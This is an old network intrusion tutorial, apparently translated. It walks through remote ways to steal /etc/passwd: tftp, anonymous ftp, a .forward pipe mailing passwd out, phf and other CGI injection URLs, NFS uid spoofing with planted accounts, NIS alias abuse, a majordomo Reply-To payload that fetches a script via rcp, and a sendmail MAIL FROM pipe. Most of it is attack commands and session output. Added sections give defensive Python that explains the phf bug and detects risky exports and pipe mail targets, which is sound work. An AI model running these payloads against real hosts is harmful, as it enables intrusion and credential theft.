samsa Network Intrusion Tutorial, Part 2

/ns/cn/jc/data/20010129103801.htm

II. Striking the ox from behind the mountain (remote attacks)
1) Grabbing things from a distance: obtaining passwd
1.1) tftp

# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit

(samsa: nothing gained, but...)

# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation

(samsa: success!!! ;-)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh

(samsa: a pity it is shadowed :-/)

1.2) Anonymous ftp
1.2.1) Direct retrieval

# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:

(samsa: your e-mail address; fake, of course :->)

230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false

(samsa: normal! Too few fools leave the complete passwd under the anonymous ftp directory)

1.2.2) The ftp home directory is writable

# cat forward_sucker_file
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged]
230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail ftp@victim.com

(samsa: now wait for the passwd file to arrive by mail...)

1.3) WWW
The famous CGI holes
1.3.1) phf
http://silly.com/cgi-bin/nph-test-cgi?*
http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
1.3.2) campus
http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\@my.e-mail.
addr\</etc/passwd;eval$CMD;echo

(samsa: the line was too long, so I wrapped it; that is fine, right? ;-)
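Added example (mine, not samsa's and not the NCSA code): why the phf URL above works. The vulnerable `escape_shell_cmd()` in NCSA httpd's util.c backslash-escaped a fixed list of shell metacharacters, and newline was not in that list, so a `%0a` in `Qalias` survived into the `popen()` command line and `/bin/sh` started a second command. The metacharacter list below is reproduced from memory and should be treated as an assumption; `ph` is never executed here, the functions only build and split the command line the way the shell would. The hardened form exec's an argv without any shell and allowlists the alias.

```python
import re
from urllib.parse import unquote

# Metacharacters the vulnerable NCSA escape_shell_cmd() backslash-escaped.
# Newline is absent: that is the phf bug. Assumption: list reproduced from memory.
NCSA_SHELL_METACHARS = set("&;`'\"|*?~<>^()[]{}$\\")


def escape_shell_cmd_ncsa(cmd):
    """Model of the vulnerable escaper: backslash every listed metachar, nothing else."""
    return "".join("\\" + c if c in NCSA_SHELL_METACHARS else c for c in cmd)


def phf_popen_line(qalias_param):
    """The string phf handed to popen(): 'ph -m alias=<escaped Qalias>'.
    The CGI layer URL-decodes first, so %0a has become a real newline."""
    decoded = unquote(qalias_param)
    return "ph -m alias=" + escape_shell_cmd_ncsa(decoded)


def shell_commands_seen(cmd_line):
    """Split a command line the way `sh -c` would: a backslash protects the next
    character, backslash-newline is a continuation, a bare newline ends a command."""
    parts, cur, i = [], "", 0
    while i < len(cmd_line):
        c = cmd_line[i]
        if c == "\\" and i + 1 < len(cmd_line):
            nxt = cmd_line[i + 1]
            if nxt != "\n":
                cur += nxt
            i += 2
            continue
        if c == "\n":
            if cur.strip():
                parts.append(cur.strip())
            cur = ""
        else:
            cur += c
        i += 1
    if cur.strip():
        parts.append(cur.strip())
    return parts


# Hardened form: no shell at all, plus an allowlist on the only user-controlled field.
_ALIAS_OK = re.compile(r"[A-Za-z0-9._-]{1,64}")


def alias_is_safe(qalias_param):
    return bool(_ALIAS_OK.fullmatch(unquote(qalias_param)))


def ph_argv_safe(qalias_param):
    """Return the argv a fixed phf would pass to execve(); nothing is run here."""
    if not alias_is_safe(qalias_param):
        raise ValueError("alias contains characters outside the allowlist")
    return ["ph", "-m", "alias=" + unquote(qalias_param)]


if __name__ == "__main__":
    for param in ("x%0acat%20/etc/passwd", "x;cat%20/etc/passwd"):
        print(param, "->", shell_commands_seen(phf_popen_line(param)))
```

A `;` in `Qalias` gets escaped and the shell sees one command, which is why the classic payload uses `%0a` rather than `;`. The fix is not a longer blocklist but removing the shell from the path entirely.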

1.4) nfs
1.4.1) If /etc is exported, nothing more needs to be said
1.4.2) If some user's home directory is exported

# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 May 11 1999 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"
^D
# echo test | mail zw@numen

(samsa: now wait for your mail....)
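Added example (mine, not part of the tutorial): the defender-side check for section 1.4. It parses `showmount -e` output and the `ls -ld` of a mounted export as the client sees it, and says who can write there. The sample input is copied from the numen session above; the only assumption is that the server squashes uid 0 and nothing else, which is the usual default, so any other uid is trusted exactly as the client presents it.

```python
# Constructed sample input, copied from the showmount -e and ls -ld output
# in the session above (host and paths are the page's own).
SHOWMOUNT_OUTPUT = """\
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
"""
LS_LD_OUTPUT = "drwxr-xr-x 6 1005 staff 2560 May 11 1999 ."


def parse_showmount(text):
    """Map each exported path to its client list; '(everyone)' becomes ['everyone']."""
    exports = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        clients = parts[1] if len(parts) > 1 else "(everyone)"
        exports[path] = [c.strip().strip("()") for c in clients.split(",")]
    return exports


def world_exports(exports):
    """Paths that any host on the network may mount."""
    return sorted(p for p, clients in exports.items() if "everyone" in clients)


def owner_from_ls_ld(line):
    """Return (mode, owner) from `ls -ld` output. A numeric owner means the uid
    has no name on the client, which is exactly what an attacker sees after mounting."""
    fields = line.split()
    mode, owner = fields[0], fields[2]
    return mode, (int(owner) if owner.isdigit() else owner)


def assess_export(exports, path, ls_ld_line):
    """One-line verdict for an export, given the client-side `ls -ld` of its root.
    Assumption: the server squashes uid 0 only; every other uid is believed."""
    clients = exports[path]
    mode, owner = owner_from_ls_ld(ls_ld_line)
    if "everyone" not in clients:
        return f"{path}: restricted to {','.join(clients)}"
    if owner == 0:
        return f"{path}: world-mountable, root-owned (writing needs the server to skip root squashing)"
    if len(mode) >= 3 and mode[2] == "w":
        return f"{path}: world-mountable; a local account with uid {owner} writes as the owner"
    return f"{path}: world-mountable, not writable by owner uid {owner}"


if __name__ == "__main__":
    ex = parse_showmount(SHOWMOUNT_OUTPUT)
    for p in ex:
        print(assess_export(ex, p, LS_LD_OUTPUT))
```

This is why the session above bothers to add a local `zw` account with uid 1005 before touching the mount: NFS authorizes by the uid the client claims, and the export list is the only thing standing between "everyone" and that directory.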

1.5) sniffer
Taking advantage of the broadcast nature of Ethernet, eavesdrop on the IP packets passing over the network and pick passwords out of them.
For the principles and technical details of sniffers, see [samsa 1999].

(samsa: not much fun; it feels like an ``unworthy victory''...)

1.6) NIS
1.6.1) Guess the domain name, then ypcat (or niscat for NIS+) yields passwd (and even shadow)
1.6.2) If you control the NIS server, you can create a mail alias

nis-master # echo 'foo: "| mail me@my.e-mail.addr < /etc/passwd "' >> /etc/alia
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com

1.7) e-mail
e.g. exploiting a bug in majordomo (ver. 1.94.3)
Reply-to: a~.`/usr/bin/rcp\${IFS}me@hacker.home.edu:script\${IFS}/tmp
/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mai

# cat script
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr
#

Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail me@my.e-mail.addr < /etc/passwd"
250 "|/bin/mail me@my.e-mail.addr < /etc/passwd"... Sender ok
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.

(samsa: wait...)
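Added example (mine, not part of the tutorial): the thread running through 1.2.2, 1.4.2, 1.6.2 and the sendmail session in 1.7 is mail delivered to a program through `|`. The detector below pulls such targets out of a `.forward` file, an `aliases` file, SMTP `MAIL FROM` lines and `Reply-To`/`From` headers, which is what you would run over a mail host or a capture when hunting for this. The `.forward`, aliases and SMTP samples are copied from the sessions above; the Reply-To sample is constructed in the shape of the majordomo trick and is not the page's own line.

```python
import re

# Samples copied from the sessions on this page.
FORWARD_FILE = '"| /bin/cat /etc/passwd|sed \'s/^/ /\'|/bin/mail me@my.e-mail.addr"\n'
ALIASES_FILE = """\
postmaster: root
foo: "| mail me@my.e-mail.addr < /etc/passwd "
"""
SMTP_SESSION = [
    'mail from: "|/bin/mail me@my.e-mail.addr < /etc/passwd"',
    "rcpt to: nosuchuser",
    "mail from: <alice@example.org>",
]
# Constructed header in the shape of the majordomo trick (backtick substitution).
REPLY_TO_HEADER = "Reply-to: x`/usr/bin/rcp${IFS}attacker:script${IFS}/tmp/script`y@example.org"

# Characters a 1990s MTA or list manager might hand to /bin/sh unescaped.
_SHELL_META = re.compile(r"[|`$;]")


def shell_meta_in(value):
    return bool(_SHELL_META.search(value))


def _split_targets(field):
    """Split a .forward / aliases target list on commas outside double quotes,
    then strip the quotes so a '"|cmd"' entry comes back as '|cmd'."""
    targets, cur, inq = [], "", False
    for c in field:
        if c == '"':
            inq = not inq
        if c == "," and not inq:
            targets.append(cur)
            cur = ""
        else:
            cur += c
    targets.append(cur)
    return [t.strip().strip('"').strip() for t in targets if t.strip()]


def pipe_targets_in_forward(text):
    """Commands a .forward would pipe incoming mail into."""
    return [t[1:].strip() for line in text.splitlines()
            for t in _split_targets(line) if t.startswith("|")]


def pipe_aliases(text):
    """(alias, command) for every aliases(4) entry that delivers to a program."""
    out = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, sep, rest = line.partition(":")
        if not sep:
            continue
        out.extend((name.strip(), t[1:].strip()) for t in _split_targets(rest) if t.startswith("|"))
    return out


def suspicious_smtp_senders(lines):
    """MAIL FROM arguments carrying shell metacharacters, as in the sendmail 5.x session."""
    hits = []
    for line in lines:
        m = re.match(r"(?i)mail\s+from:\s*(.*)", line.strip())
        if m and shell_meta_in(m.group(1)):
            hits.append(m.group(1))
    return hits


def suspicious_headers(raw_headers, names=("reply-to", "from", "sender")):
    """(header, value) pairs whose address part carries shell metacharacters."""
    hits = []
    for line in raw_headers.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() in names and shell_meta_in(value):
            hits.append((name.strip(), value.strip()))
    return hits


if __name__ == "__main__":
    print(pipe_targets_in_forward(FORWARD_FILE))
    print(pipe_aliases(ALIASES_FILE))
    print(suspicious_smtp_senders(SMTP_SESSION))
    print(suspicious_headers(REPLY_TO_HEADER))
```

A legitimate `|` target (a vacation program, a list manager) will show up too; the point of the detector is to produce the short list you then check against what the owner of that home directory or alias actually intended, and, for the ftp user, the answer is never a pipe.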